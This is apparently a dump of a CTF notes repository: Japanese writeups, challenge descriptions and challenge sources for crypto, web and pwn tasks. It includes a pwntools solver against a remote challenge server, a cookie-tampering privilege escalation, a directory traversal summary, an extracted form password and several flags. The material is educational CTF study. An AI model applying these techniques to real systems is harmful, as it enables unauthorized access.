dasd\nPlease enter an integer\n\n - [2/10] Guess the next number!\n> adsa\nPlease enter an integer\n\n - [3/10] Guess the next number!\n> dsa\nPlease enter an integer\n\n - [4/10] Guess the next number!\n> ds\naPlease enter an integer\n\n - [5/10] Guess the next number!\n> fs\nPlease enter an integer\n\n - [6/10] Guess the next number!\n> fa\nPlease enter an integer\n\n - [7/10] Guess the next number!\n> sa\nPlease enter an integer\n\n - [8/10] Guess the next number!\n> dsa\nPlease enter an integer\n\n - [9/10] Guess the next number!\n> d\nPlease enter an integer\n\n - [10/10] Guess the next number!\n> a\nPlease enter an integer\n\nCongratz! FLAG{\n```\n\n<!-- FLAG{y0u_sh0uld_buy_l0tt3ry_t1ck3ts} -->\n" }, { "alpha_fraction": 0.632612943649292, "alphanum_fraction": 0.683693528175354, "avg_line_length": 13.54285717010498, "blob_id": "6284a51ed6e46508157201d7ca9d079b07503ca9", "content_id": "def7a3391216f17c55a655409a59c30492a793a9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1414, "license_type": "no_license", "max_line_length": 92, "num_lines": 70, "path": "/2020/pbctf_2020/Apoche_I/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Not solved :(\n\n# Try\n\n提示された5つのリンクのうち、http://34.68.159.75:55275/ だけアクセスできる。\n\nさらに2つリンクがあって、上ではJavaScript、下ではCSSが読み込まれる。\n\n![](img/2020-12-06-12-54-56.png)\n\n`JavaScript`\n\n```js\n// FOrce the user to click okay many times\n\nconsole.log(\"uhmm you asked for it!!\");\n\nvar i;\n\n\n\nfor (i = 0; i < 100000; i++)\n alert(\"Hello world!1!!!! \");\n\n\n//ahh you disabled them :*(\n//\ndocument.write(\"Ahh why did you disable those dialogs...? We were having a lot of fun! ;)\");\n```\n\n```css\n@font-face {\n font-family: ComicSans;\n src: url(ComicSansMS3.ttf);\n}\n\nbody {\n font-family: ComicSans;\n}\n\n.bold {\n font-weight: bold;\n}\n\n.it {\n font-style: italic;\n}\n\n.mono {\n font-family: Monospace;\n}\n```\n\n手がかりがつかめず...\n\n# Solution\n\n**[writeup]**\n\n* https://github.com/0xbigshaq/ctf-stuff/tree/main/perfect-blue-ctf-2020/apoche\n\n`robots.txt`を使ってディレクトリ構造を確かめる。\n\nこうして見つかった`secrets`ディレクトリの中にヒントがあるので、それをもとにディレクトリトラバーサルでフラグを入手。\n\n(2020/12/07 サーバーが立ち上がっていないので確認できず...)\n\n## Comment\n\nWeb問題で`robots.txt`を手がかりにするというのは、pwn問題でいうところの表層解析に等しいのかもしれないと思った。\n" }, { "alpha_fraction": 0.5384615659713745, "alphanum_fraction": 0.6380090713500977, "avg_line_length": 19.090909957885742, "blob_id": "4a5c079ec7e51dc9e84f0d1462b75b5a6a431f84", "content_id": "47a3cfaba63fa5dc28ccc64564789cf2cbf35148", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 221, "license_type": "no_license", "max_line_length": 57, "num_lines": 11, "path": "/2021/RaRCTF_2021/Archer/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "from pwn import *\n\ne = ELF('archer')\nio = remote('193.57.159.27', 23258)\n\nio.recvuntil(': ')\nio.sendline('yes')\nio.recvuntil('?\\n')\nh = str(hex(e.symbols['code']-0x500000)).replace('0x','')\nio.sendline(h)\nio.interactive()\n" }, { "alpha_fraction": 0.7394366264343262, "alphanum_fraction": 0.7652581930160522, "avg_line_length": 31.846153259277344, "blob_id": "5ea2c43cdefb992ccc1ee8ae21d6f84f3afc94c1", "content_id": "5e5d4bf7f33ca12f428090b11d685d78f347dd9a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 426, "license_type": "no_license", "max_line_length": 209, "num_lines": 13, "path": "/2021/BCACTF_2.0/Movie-Login-2/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "It's that time of year again! Another movie is coming out, and I really want to get some insider information. I heard that you leaked the last movie poster, and I was wondering if you could do it again for me?\n\n[denylist.json](https://objects.bcactf.com/bcactf2/movie-login-2/denylist.json)\n\nhttp://web.bcactf.com:49153/\n\nHint 1 of 2\n\nWhat steps are they taking to prevent an injection?\n\nHint 2 of 2\n\nCheck the denylist maybe?" }, { "alpha_fraction": 0.4937877058982849, "alphanum_fraction": 0.5044373273849487, "avg_line_length": 26.891088485717773, "blob_id": "a5c9dc64276750d57bed90a700fb98c529953026", "content_id": "9f947530e79cf5de3b9d4ad2dabf24e550a2895a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2817, "license_type": "no_license", "max_line_length": 82, "num_lines": 101, "path": "/2021/WaniCTF21-spring/OUCS/cry-oucs/server.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "import random\n\nfrom Crypto.Util.number import bytes_to_long, getPrime, long_to_bytes\n\nfrom const import description, flag, logo\n\n\nclass OkamotoUchiyamaCryptoSystem:\n def __init__(self, bits: int):\n p, q = getPrime(bits), getPrime(bits)\n n = p * p * q\n\n while g := random.randrange(2, n):\n if pow(g, p - 1, p * p) != 1:\n break\n h = pow(g, n, n)\n\n self.p = p\n self.n = n\n self.g = g\n self.h = h\n\n def encrypt(self, plaintext: bytes) -> bytes:\n plaintext = bytes_to_long(plaintext)\n n, g, h = self.n, self.g, self.h\n r = random.randrange(2, n)\n\n ciphertext = pow(g, plaintext, n) * pow(h, r, n) % n\n ciphertext = long_to_bytes(ciphertext)\n\n return ciphertext\n\n def decrypt(self, ciphertext: bytes) -> bytes:\n ciphertext = bytes_to_long(ciphertext)\n p, g = self.p, self.g\n\n a = (pow(ciphertext, p - 1, p ** 2) - 1) // p\n b = (pow(g, p - 1, p * p) - 1) // p\n b_ = pow(b, -1, p)\n plaintext = a * b_ % p\n plaintext = long_to_bytes(plaintext)\n\n return plaintext\n\n def get_publickey(self) -> tuple[int, int, int]:\n return self.n, self.g, self.h\n\n\nif __name__ == \"__main__\":\n print(logo)\n cipher = OkamotoUchiyamaCryptoSystem(bits=1024)\n\n while True:\n print()\n print(description)\n while not (choice := input(\"> \")) in \"12345\":\n print(\"Invalid choice.\")\n\n choice = int(choice)\n\n # 1. Encrypt the flag\n if choice == 1:\n ciphertext = cipher.encrypt(flag)\n ciphertext = bytes_to_long(ciphertext)\n print(f\"{ciphertext = :#x}\")\n\n # 2. Encrypt\n elif choice == 2:\n print(\"Enter your plaintext\")\n plaintext = int(input(\"> \"), 0)\n plaintext = long_to_bytes(plaintext)\n\n ciphertext = cipher.encrypt(plaintext)\n ciphertext = bytes_to_long(ciphertext)\n print(f\"{ciphertext = :#x}\")\n\n # 3. Decrypt\n elif choice == 3:\n print(\"Enter your ciphertext\")\n ciphertext = int(input(\"> \"), 0)\n ciphertext = long_to_bytes(ciphertext)\n\n # ... except for the flag\n plaintext = cipher.decrypt(ciphertext)\n if flag == plaintext:\n print(\"Decryption succeeded, but we won't tell you the result :P\")\n continue\n plaintext = bytes_to_long(plaintext)\n print(f\"{plaintext = :#x}\")\n\n # 4. Show public key\n elif choice == 4:\n n, g, h = cipher.get_publickey()\n print(f\"{n = :#x}\")\n print(f\"{g = :#x}\")\n print(f\"{h = :#x}\")\n\n # 5. Exit\n else:\n print(\"Bye :)\")\n break\n" }, { "alpha_fraction": 0.6217579245567322, "alphanum_fraction": 0.6476945281028748, "avg_line_length": 21.40322494506836, "blob_id": "5af387c41c14b2dd684a81d8be8ff6dc31dd7550", "content_id": "63da03f469b6ce7637a79e9576b8697b9f8fba97", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1388, "license_type": "no_license", "max_line_length": 76, "num_lines": 62, "path": "/2021/WaniCTF21-spring/Automaton_Lab/mis-automaton-lab/automaton-lab.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "import sys\nfrom concurrent.futures import ThreadPoolExecutor\nimport random\nfrom Crypto.Util.number import getPrime\n\nimport const\nimport automaton\n\ncells = 15\n\n\ndef checkanswer(reference, answer):\n if len(answer) != cells:\n print(const.error)\n sys.exit()\n for c in answer:\n if not (c == \"0\" or c == \"1\"):\n print(const.error)\n sys.exit()\n answer = int(answer, 2)\n if reference != answer:\n print(const.lose)\n sys.exit()\n return\n\nsolver = automaton.rule30(bits=cells)\nprint(const.message1)\ninput()\n\n# 1st Question\ninit = random.randint(1, 2**cells - 2)\ngen = 7\nreference = solver.solve(init, gen)\nprint(const.quiz1)\nprint(\"init = \" + format(init, \"0\"+str(cells)+\"b\"))\nprint(\"gen = \" + str(gen))\nanswer = input(\"> \")\ncheckanswer(reference, answer)\n\n# 2nd Question\ninit = (1 << random.randint(0, cells-1)) | (1 << random.randint(0, cells-1))\ngen = 997\nreference = solver.solve(init, gen)\nprint(const.quiz2)\nprint(\"init = \" + format(init, \"0\"+str(cells)+\"b\"))\nprint(\"gen = \" + str(gen))\nanswer = input(\"> \")\ncheckanswer(reference, answer)\n\n# 3rd Quiestion\ninit = 1\ngen = getPrime(1024)\nreference = solver.solve(init, gen)\nprint(const.quiz3)\nprint(\"init = \" + format(init, \"0\"+str(cells)+\"b\"))\nprint(\"gen = \" + str(gen))\nanswer = input(\"> \")\ncheckanswer(reference, answer)\n\n# Congratz\nprint(const.message2)\nprint(const.flag)" }, { "alpha_fraction": 0.7827715277671814, "alphanum_fraction": 0.8164793848991394, "avg_line_length": 52.599998474121094, "blob_id": "60327e7ecc78a9eec8e68a9c1e2dee31aefa1ec2", "content_id": "c5b6477a65b8d054c9931b6d37e661a6f688c16c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 267, "license_type": "no_license", "max_line_length": 119, "num_lines": 5, "path": "/2020/SquareCTF2020/Oh_Sheet/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Someone very cheeky decided to encrypt their secret message in Google Sheets. What could they be hiding in plain sight?\n\nCurious! Click on the link below to find out more:\n\nhttps://docs.google.com/spreadsheets/d/15PFb_fd6xKVIJCF0b0XiiNeilFb-L4jm2uErip1woOM/edit#gid=0" }, { "alpha_fraction": 0.36228814721107483, "alphanum_fraction": 0.8389830589294434, "avg_line_length": 22.600000381469727, "blob_id": "be2f81064dc6a802d2aa2436876561a0cf2e231a", "content_id": "401db04420f3cd29a25701ff9f3c66d3556650e5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1136, "license_type": "no_license", "max_line_length": 223, "num_lines": 40, "path": "/2021/BCACTF_2.0/Sailing_Thru_Decryption/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n以下の画像が与えられる。\n\n![](./image.png)\n\n国旗のような部分は 国際信号旗 のマークであることが分かった。\n\n* https://ja.wikipedia.org/wiki/国際信号旗\n\n解読すると、 \n\n```\n011001110110101001110011011011010111011101110011\n011110110011000101111000010111110110111100110001\n011010110101111101111000001101000111000001110010\n010111110110110000110011011110010011010001101010\n011011100011111101111101\nTHEKEYISFHSKDN\n```\n\nとなる。\n\n```py\nfrom Crypto.Util.number import *\nfrom pwn import *\n\nc = b'011001110110101001110011011011010111011101110011011110110011000101111000010111110110111100110001011010110101111101111000001101000111000001110010010111110110110000110011011110010011010001101010011011100011111101111101'\nkey = b'FHSKDN'\n\nprint(long_to_bytes(int(c,2)))\n\n# Vigenere Decode with key FHSKDN\n# \n# https://gchq.github.io/CyberChef/#recipe=Vigen%C3%A8re_Decode('FHSKDN')&input=Z2pzbXdzezF4X28xa194NHByX2wzeTRqbj99\n```\n\nバイナリを文字列に変換し、ヴィジュネル暗号で復号化したものがフラグになっていた。\n\n<!-- bcactf{1s_h1s_n4me_g3r4rd?} -->\n" }, { "alpha_fraction": 0.6764705777168274, "alphanum_fraction": 0.8382353186607361, "avg_line_length": 28.14285659790039, "blob_id": "b895998344176dee36cddac082d2e33476b65d8e", "content_id": "7efc961e13cc94b68c66574271eb70f0e0d9e0d4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 214, "license_type": "no_license", "max_line_length": 121, "num_lines": 7, "path": "/2021/SECCON_Beginners_CTF_2021/depixelization/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Can you depixelize it ?\n\n[depixelization.tar.gz](https://beginners-dist-production.s3.isk01.sakurastorage.jp/depixelization/depixelization.tar.gz)\n\nbe6484841b5f6086c9f2609fdce5622313308688\n\n想定難易度: Medium\n" }, { "alpha_fraction": 0.7164179086685181, "alphanum_fraction": 0.7686567306518555, "avg_line_length": 23.363636016845703, "blob_id": "c5159cc16a9aae4b4427928bfbb01a2f8a14868a", "content_id": "4f38f2da6b3e3023bf5ff6cee1c14de7339adab3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 268, "license_type": "no_license", "max_line_length": 127, "num_lines": 11, "path": "/2021/ImaginaryCTF_2021/stackoverflow/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "**Description**\n\nWelcome to Stack Overflow! Get answers to all your programming questions right here!\n\n**Attachments**\n\n[https://imaginaryctf.org/r/E795-stackoverflow](https://imaginaryctf.org/r/E795-stackoverflow) `nc chal.imaginaryctf.org 42001`\n\n**Author**\n\nEth007\n" }, { "alpha_fraction": 0.7028753757476807, "alphanum_fraction": 0.7859424948692322, "avg_line_length": 61.599998474121094, "blob_id": "a3f9cf965c38339d1009cfe08f53d4b52a41a0e7", "content_id": "4f48365bd2a1faed1901e2de5e7efcf15cbf244c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 313, "license_type": "no_license", "max_line_length": 135, "num_lines": 5, "path": "/2021/RaRCTF_2021/unrandompad/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Yeah I use randomized padding, it increases security!\n\nNote: This is a part 1 challenge of `randompad`. Take a look at the source for that one and compare the two for a hint on how to solve.\n\n[unrandompad.py - 768eb4](https://files-ctf.rars.win/challenge-files/29/768eb4fff7128eff3f709d9070bf271e/unrandompad.py)\n" }, { "alpha_fraction": 0.300991952419281, "alphanum_fraction": 0.35678860545158386, "avg_line_length": 66.20833587646484, "blob_id": "4642057d0ff86ce0790b8f5d11a8a330364be4b9", "content_id": "9eb86587082e35696f049377b1434a9070e3da22", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3230, "license_type": "no_license", "max_line_length": 113, "num_lines": 48, "path": "/2021/WaniCTF21-spring/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# WaniCTF'21-spring\n\n* https://score.wanictf.org/#/\n\n* 2021/04/30 10:00 JST — 2021/05/02 20:00 JST\n\n## Official Writeup\n\n* https://github.com/wani-hackase/wanictf21spring-writeup\n\n## My Challenges\n\n### Solved\n\n| tag | problem | comment | score | solved |\n| --------- | ------------------------------------------------ | ----------------------------- | ----: | -----: |\n| Pwn | [01 netcat](01_netcat) | netcat | 142 | 259 |\n| Misc | [Automaton Lab.](Automaton_Lab) | Rule30 | 262 | 45 |\n| Misc | [binary](binary) | binary to string | 156 | 187 |\n| Crypto | [Can't restore the flag?](Cant_restore_the_flag) | Chinese Remainder Theorem | 207 | 83 |\n| Web | [CloudFront Basic Auth](CloudFront_Basic_Auth) | | 282 | 37 |\n| Crypto | [Easy](Easy) | | 166 | 152 |\n| Web | [exception](exception) | | 186 | 110 |\n| Reversing | [execute](execute) | assembly | 190 | 105 |\n| Crypto | [Extra](Extra) | RSA 2p+q | 219 | 72 |\n| Web | [fake](fake) | DevTools | 136 | 305 |\n| Misc | [Git Master](Git_Master) | docker, git | 217 | 74 |\n| Forensics | [illegal image](illegal_image) | wireshark, ICMP | 271 | 41 |\n| Reversing | [licence](licence) | angr | 285 | 36 |\n| Forensics | [MixedUSB](MixedUSB) | strings | 175 | 131 |\n| Crypto | [OUCS](OUCS) | Okamoto–Uchiyama cryptosystem | 300 | 31 |\n| Forensics | [presentation](presentation) | ppsx | 142 | 258 |\n| Reversing | [secret](secret) | strings | 150 | 210 |\n| Forensics | [secure document](secure_document) | AutoHotKey | 207 | 83 |\n| Crypto | [Simple conversion](Simple_conversion) | int to bytes | 154 | 192 |\n| Forensics | [slow](slow) | Slow Scan television | 274 | 40 |\n| Reversing | [timer](timer) | GDB, change variable\\ | 202 | 89 |\n| Web | [Wani Request 1](Wani_Request_1) | webhook | 148 | 220 |\n| Web | [Wani Request 2](Wani_Request_2) | webhook. xss | 250 | 51 |\n| Web | [watch animal](watch_animal) | Blind SQL injection | 219 | 72 |\n\n---\n\n## Result\n\n* 4940 points\n\n* 27 / 353 (> 1 pt)\n" }, { "alpha_fraction": 0.6148936152458191, "alphanum_fraction": 0.721276581287384, "avg_line_length": 19.434782028198242, "blob_id": "da3421764e7f56a6e3ca15efa369d17e2f82e0d4", "content_id": "7d2e9806d4bbc457165a13c9ab766e95671d67c0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 670, "license_type": "no_license", "max_line_length": 70, "num_lines": 23, "path": "/2021/BCACTF_2.0/Home_Automation/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\nhttp://web.bcactf.com:49154/ にアクセスする。\n\n![](img/2021-06-13-13-25-15.png)\n\n[Log in as guest] ボタンを押すと Lights の ON/OFF ボタンが表示される。\n\n![](img/2021-06-13-13-26-50.png)\n\nOFFにしようとすると、http://web.bcactf.com:49155/off に飛ばされ、\n\n```\nYou must be admin to turn off the lights. Currently you are \"vampire\".\n```\n\nというメッセージが表示される。\n\nCookie情報を見ると `user=vampire`となっているので、`user=admin`に書き換える。\n\nページを再読み込みするとフラグが表示された。\n\n<!-- bcactf{c00k13s_s3rved_fr3sh_fr0m_th3_smart_0ven_cD7EE09kQ} -->\n" }, { "alpha_fraction": 0.5733557939529419, "alphanum_fraction": 0.5851601958274841, "avg_line_length": 20.178571701049805, "blob_id": "83dfb5f209333942edd498345888b9eb3b2d103d", "content_id": "2a521827aeda7edf8306262b863cafe3c2c4aca9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 593, "license_type": "no_license", "max_line_length": 59, "num_lines": 28, "path": "/2021/SECCON_Beginners_CTF_2021/Logical_SEESAW/problem.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "from Crypto.Util.number import *\nfrom random import random, getrandbits\nfrom flag import flag\n\nflag = bytes_to_long(flag.encode(\"utf-8\"))\nlength = flag.bit_length()\nkey = getrandbits(length)\nwhile not length == key.bit_length():\n key = getrandbits(length)\n\nflag = list(bin(flag)[2:])\nkey = list(bin(key)[2:])\n\ncipher_L = []\n\nfor _ in range(16):\n cipher = flag[:]\n m = 0.5\n \n for i in range(length):\n n = random()\n if n > m:\n cipher[i] = str(eval(cipher[i] + \"&\" + key[i]))\n \n cipher_L.append(\"\".join(cipher))\n\n\nprint(\"cipher =\", cipher_L)\n" }, { "alpha_fraction": 0.3331211507320404, "alphanum_fraction": 0.6738807559013367, "avg_line_length": 24.96143341064453, "blob_id": "4b2ac90c4df82b1c109ba28d4d845f82514e6a47", "content_id": "2fd6ad0730256acd06a271dfc3fa397271c97d44", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 9864, "license_type": "no_license", "max_line_length": 136, "num_lines": 363, "path": "/2020/pbctf_2020/GCombo/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n問題のリンク先に飛ぶと、Googleフォームの画面になる。0~9の選択肢があり、選択すれば次に進むことができる。\n\nページのソースを読むと`<script>`タグに以下のような記述がある。\n\n<details><summary>script</summary>\n\n```js\nvar FB_PUBLIC_LOAD_DATA_ = [null,[null,[[938169490,null,null,2,[[1420416147,[[\"1\",null,1935811336,null,0]\n,[\"2\",null,1935811336,null,0]\n,[\"3\",null,1935811336,null,0]\n,[\"4\",null,1935811336,null,0]\n,[\"5\",null,1114266997,null,0]\n,[\"6\",null,1935811336,null,0]\n,[\"7\",null,1935811336,null,0]\n,[\"8\",null,1935811336,null,0]\n,[\"9\",null,1935811336,null,0]\n,[\"0\",null,1935811336,null,0]\n]\n,1,null,null,null,null,null,0]\n]\n]\n,[691517430,null,null,8]\n,[566314179,null,null,2,[[1728367628,[[\"1\",null,1076236325,null,0]\n,[\"2\",null,1076236325,null,0]\n,[\"3\",null,1076236325,null,0]\n,[\"4\",null,1076236325,null,0]\n,[\"5\",null,1076236325,null,0]\n,[\"6\",null,1076236325,null,0]\n,[\"7\",null,1076236325,null,0]\n,[\"8\",null,1076236325,null,0]\n,[\"9\",null,311281996,null,0]\n,[\"0\",null,1076236325,null,0]\n]\n,1,null,null,null,null,null,0]\n]\n]\n,[1996292448,null,null,8]\n,[255198225,null,null,2,[[810673342,[[\"1\",null,918802994,null,0]\n,[\"2\",null,311281996,null,0]\n,[\"3\",null,78472441,null,0]\n,[\"4\",null,691517430,null,0]\n,[\"5\",null,29278772,null,0]\n,[\"6\",null,691517430,null,0]\n,[\"7\",null,918802994,null,0]\n,[\"8\",null,691517430,null,0]\n,[\"9\",null,1138684813,null,0]\n,[\"0\",null,29278772,null,0]\n]\n,1,null,null,null,null,null,0]\n]\n]\n,[147720654,null,null,8]\n,[1968136211,null,null,2,[[715448114,[[\"1\",null,311281996,null,0]\n,[\"2\",null,1737460359,null,0]\n,[\"3\",null,1076236325,null,0]\n,[\"4\",null,1935811336,null,0]\n,[\"5\",null,1935811336,null,0]\n,[\"6\",null,694883742,null,0]\n,[\"7\",null,78472441,null,0]\n,[\"8\",null,911811804,null,0]\n,[\"9\",null,691517430,null,0]\n,[\"0\",null,29278772,null,0]\n]\n,1,null,null,null,null,null,0]\n]\n]\n,[918802994,null,null,8]\n,[1421773386,null,null,2,[[1855524489,[[\"1\",null,29278772,null,0]\n,[\"2\",null,29278772,null,0]\n,[\"3\",null,29278772,null,0]\n,[\"4\",null,1935811336,null,0]\n,[\"5\",null,29278772,null,0]\n,[\"6\",null,29278772,null,0]\n,[\"7\",null,918802994,null,0]\n,[\"8\",null,29278772,null,0]\n,[\"9\",null,29278772,null,0]\n,[\"0\",null,29278772,null,0]\n]\n,1,null,null,null,null,null,0]\n]\n]\n,[1094087816,null,null,8]\n,[479285638,null,null,2,[[543826744,[[\"1\",null,147720654,null,0]\n,[\"2\",null,267261990,null,0]\n,[\"3\",null,29278772,null,0]\n,[\"4\",null,311281996,null,0]\n,[\"5\",null,29278772,null,0]\n,[\"6\",null,29278772,null,0]\n,[\"7\",null,29278772,null,0]\n,[\"8\",null,911811804,null,0]\n,[\"9\",null,29278772,null,0]\n,[\"0\",null,694883742,null,0]\n]\n,1,null,null,null,null,null,0]\n]\n]\n,[267261990,null,null,8]\n,[968358138,null,null,2,[[1434188549,[[\"1\",null,78472441,null,0]\n,[\"2\",null,78472441,null,0]\n,[\"3\",null,78472441,null,0]\n,[\"4\",null,78472441,null,0]\n,[\"5\",null,78472441,null,0]\n,[\"6\",null,78472441,null,0]\n,[\"7\",null,78472441,null,0]\n,[\"8\",null,78472441,null,0]\n,[\"9\",null,78472441,null,0]\n,[\"0\",null,1935811336,null,0]\n]\n,1,null,null,null,null,null,0]\n]\n]\n,[311281996,null,null,8]\n,[134264431,null,null,2,[[1393438304,[[\"1\",null,691517430,null,0]\n,[\"2\",null,691517430,null,0]\n,[\"3\",null,691517430,null,0]\n,[\"4\",null,691517430,null,0]\n,[\"5\",null,691517430,null,0]\n,[\"6\",null,691517430,null,0]\n,[\"7\",null,691517430,null,0]\n,[\"8\",null,29278772,null,0]\n,[\"9\",null,918802994,null,0]\n,[\"0\",null,691517430,null,0]\n]\n,1,null,null,null,null,null,0]\n]\n]\n,[1138684813,null,null,8]\n,[1618229729,null,null,2,[[1942029415,[[\"1\",null,29278772,null,0]\n,[\"2\",null,29278772,null,0]\n,[\"3\",null,46599266,null,0]\n,[\"4\",null,918802994,null,0]\n,[\"5\",null,1935811336,null,0]\n,[\"6\",null,1935811336,null,0]\n,[\"7\",null,1935811336,null,0]\n,[\"8\",null,691517430,null,0]\n,[\"9\",null,267261990,null,0]\n,[\"0\",null,694883742,null,0]\n]\n,1,null,null,null,null,null,0]\n]\n]\n,[29278772,null,null,8]\n,[356414873,null,null,2,[[1297001036,[[\"1\",null,311281996,null,0]\n,[\"2\",null,311281996,null,0]\n,[\"3\",null,1935811336,null,0]\n,[\"4\",null,311281996,null,0]\n,[\"5\",null,918802994,null,0]\n,[\"6\",null,311281996,null,0]\n,[\"7\",null,311281996,null,0]\n,[\"8\",null,311281996,null,0]\n,[\"9\",null,311281996,null,0]\n,[\"0\",null,311281996,null,0]\n]\n,1,null,null,null,null,null,0]\n]\n]\n,[751651474,null,null,8]\n,[766405565,\"Password Please\",null,0,[[1674649702,null,1,null,[[4,301,[\"s3cuR3_p1n_id_2_3v3ry0ne\"]\n,\"Invalid password!\"]\n]\n]\n]\n]\n,[1935811336,null,null,8,null,-3]\n,[1068483333,null,null,2,[[1193056009,[[\"1\",null,918802994,null,0]\n,[\"2\",null,918802994,null,0]\n,[\"3\",null,918802994,null,0]\n,[\"4\",null,918802994,null,0]\n,[\"5\",null,1935811336,null,0]\n,[\"6\",null,918802994,null,0]\n,[\"7\",null,918802994,null,0]\n,[\"8\",null,918802994,null,0]\n,[\"9\",null,918802994,null,0]\n,[\"0\",null,918802994,null,0]\n]\n,1,null,null,null,null,null,0]\n]\n]\n,[1114266997,null,null,8]\n,[1155155958,null,null,2,[[203483032,[[\"1\",null,918802994,null,0]\n,[\"2\",null,918802994,null,0]\n,[\"3\",null,918802994,null,0]\n,[\"4\",null,918802994,null,0]\n,[\"5\",null,918802994,null,0]\n,[\"6\",null,918802994,null,0]\n,[\"7\",null,918802994,null,0]\n,[\"8\",null,1094087816,null,0]\n,[\"9\",null,918802994,null,0]\n,[\"0\",null,918802994,null,0]\n]\n,1,null,null,null,null,null,0]\n]\n]\n,[1566374398,null,null,8]\n,[1166405465,null,null,2,[[808283334,[[\"1\",null,78472441,null,0]\n,[\"2\",null,78472441,null,0]\n,[\"3\",null,78472441,null,0]\n,[\"4\",null,78472441,null,0]\n,[\"5\",null,29278772,null,0]\n,[\"6\",null,29278772,null,0]\n,[\"7\",null,1385363611,null,0]\n,[\"8\",null,691517430,null,0]\n,[\"9\",null,311281996,null,0]\n,[\"0\",null,311281996,null,0]\n]\n,1,null,null,null,null,null,0]\n]\n]\n,[1737460359,null,null,8]\n,[1840461575,null,null,2,[[1332022630,[[\"1\",null,918802994,null,0]\n,[\"2\",null,918802994,null,0]\n,[\"3\",null,29278772,null,0]\n,[\"4\",null,1935811336,null,0]\n,[\"5\",null,29278772,null,0]\n,[\"6\",null,1996292448,null,0]\n,[\"7\",null,694883742,null,0]\n,[\"8\",null,694883742,null,0]\n,[\"9\",null,267261990,null,0]\n,[\"0\",null,1076236325,null,0]\n]\n,1,null,null,null,null,null,0]\n]\n]\n,[1076236325,null,null,8]\n,[797867693,null,null,2,[[377985608,[[\"1\",null,267261990,null,0]\n,[\"2\",null,267261990,null,0]\n,[\"3\",null,311281996,null,0]\n,[\"4\",null,267261990,null,0]\n,[\"5\",null,267261990,null,0]\n,[\"6\",null,267261990,null,0]\n,[\"7\",null,267261990,null,0]\n,[\"8\",null,267261990,null,0]\n,[\"9\",null,267261990,null,0]\n,[\"0\",null,267261990,null,0]\n]\n,1,null,null,null,null,null,0]\n]\n]\n,[911811804,null,null,8]\n,[519821694,null,null,2,[[375069514,[[\"1\",null,691517430,null,0]\n,[\"2\",null,694883742,null,0]\n,[\"3\",null,694883742,null,0]\n,[\"4\",null,694883742,null,0]\n,[\"5\",null,694883742,null,0]\n,[\"6\",null,267261990,null,0]\n,[\"7\",null,694883742,null,0]\n,[\"8\",null,694883742,null,0]\n,[\"9\",null,694883742,null,0]\n,[\"0\",null,694883742,null,0]\n]\n,1,null,null,null,null,null,0]\n]\n]\n,[46599266,null,null,8]\n,[1390310175,null,null,2,[[1697347835,[[\"1\",null,1935811336,null,0]\n,[\"2\",null,1935811336,null,0]\n,[\"3\",null,1566374398,null,0]\n,[\"4\",null,1935811336,null,0]\n,[\"5\",null,267261990,null,0]\n,[\"6\",null,1076236325,null,0]\n,[\"7\",null,918802994,null,0]\n,[\"8\",null,691517430,null,0]\n,[\"9\",null,694883742,null,0]\n,[\"0\",null,78472441,null,0]\n]\n,1,null,null,null,null,null,0]\n]\n]\n,[694883742,null,null,8]\n,[522640729,null,null,2,[[1902611163,[[\"1\",null,1935811336,null,0]\n,[\"2\",null,918802994,null,0]\n,[\"3\",null,1935811336,null,0]\n,[\"4\",null,1935811336,null,0]\n,[\"5\",null,29278772,null,0]\n,[\"6\",null,311281996,null,0]\n,[\"7\",null,1935811336,null,0]\n,[\"8\",null,1935811336,null,0]\n,[\"9\",null,1935811336,null,0]\n,[\"0\",null,1935811336,null,0]\n]\n,1,null,null,null,null,null,0]\n]\n]\n,[1385363611,null,null,8,null,-2]\n,[1048798699,null,null,2,[[40272340,[[\"1\",null,918802994,null,0]\n,[\"2\",null,311281996,null,0]\n,[\"3\",null,694883742,null,0]\n,[\"4\",null,691517430,null,0]\n,[\"5\",null,911811804,null,0]\n,[\"6\",null,691517430,null,0]\n,[\"7\",null,918802994,null,0]\n,[\"8\",null,691517430,null,0]\n,[\"9\",null,1935811336,null,0]\n,[\"0\",null,751651474,null,0]\n]\n,1,null,null,null,null,null,0]\n]\n]\n,[78472441,null,null,8]\n,[1849390960,null,null,2,[[200591249,[[\"1\",null,911811804,null,0]\n,[\"2\",null,911811804,null,0]\n,[\"3\",null,311281996,null,0]\n,[\"4\",null,911811804,null,0]\n,[\"